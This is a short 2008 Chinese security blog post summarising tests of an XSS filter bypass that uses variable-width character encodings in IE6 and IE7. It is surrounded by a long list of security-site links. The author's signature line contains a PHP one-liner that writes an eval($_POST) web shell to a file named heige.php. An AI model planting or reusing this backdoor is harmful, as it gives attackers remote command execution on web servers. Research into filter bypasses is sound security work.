-
2008-06-09
Bypassing script filters with variable-width encodings
版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明
http://superhei.blogbus.com/logs/22568721.html
url:http://applesoup.googlepages.com/bypass_filter.txt
作者测试的时候还是ie6今天测试了一把ie7:
http://60.190.243.111/superhei/xss/charset.bmp
我这里没有ie8的,有的同学帮忙测试下,测试代码为原文里的 example.php
结果模块: http://60.190.243.111/superhei/xss/charset.txt
从ie6到ie7只限制了utf8的,其他一样 。
随机文章:
Data:_URI_scheme 2008-06-21rgod:i am not dead~~ 2008-04-29Google---We're sorry 2006-11-08又是被动过滤..... 2006-02-26casi4 2006-02-02
收藏到:Del.icio.us
5up3rh3i'blog[提供有偿web代码安全审计服务]
MSN:SuperHei@ph4nt0m.org< ?fputs(fopen('heige.php','w+'),'< ?php @eval($_POST[c])? >');? >
搜索
最新文章
最新评论
链接
- #########
- 舒舒
- 二哥哥
- lanker
- fa1l3n
- axis
- swap
- lvhuana
- spr1t3
- 小沈
- fox
- 随便名字
- GaRY
- 7j
- RAyH4c
- #########
- PST
- HackTic
- 2600
- NGS
- cgisecurity
- owasp
- seclists
- argeniss
- phpsec
- bugtraq
- milw0rm
- phpsecure
- T.H.C
- webappsec
- phpsec'blog
- shiflett.org
- secyou
- Rst
- waraxe
- appsecinc
- northern-monkee
- blog.0x557
- ush
- EST
- securityreason
- infoshackers
- zwell
- spidynamics
- morx
- securitytracker
- modsecurity
- securiteam
- securiteam's blog
- phpclasse
- hardened-php
- csdn
- pro-hack
- f-secure
- rubyforge
- wisec
- redteam-pentesting
- alertpool
- blog.php-security
- timvw
- sqlsec
- sourceforge
- zeroknock
- qasec
- hacksafe
- smartsecurity
- gulftech
- thespanner
- nth-dimension.org.uk
- secweb
- cera.secniche.org
- swan不是牛
- Getahead
- xssed
- kuza55
- myappsecurity
- xssworm
- playhack
- hackademix
- manicode
- switch
- planet-websecurity
- disenchant.ch
- hackathology
- blueinfy
- bindshell
- net-square
- yaisb
- sirdarckcat
- googleonlinesecurity
- ########
- darkc0de
- darknet
- insecuremag
- serversniff
- tbs_pocket_knife
- seeknot
- php手册
- frsirt-google
- grip
- vuln.watch
- securitytracker.com
- connectionstrings
- oracle sec
- r00tin
- rawlab
- sommarskog
- taossa
- neilcar
- spl0it
- notsosecure.com
- dross
- ie's blog
- bluehat
评论
我是衡阳的,想认识你可以吗?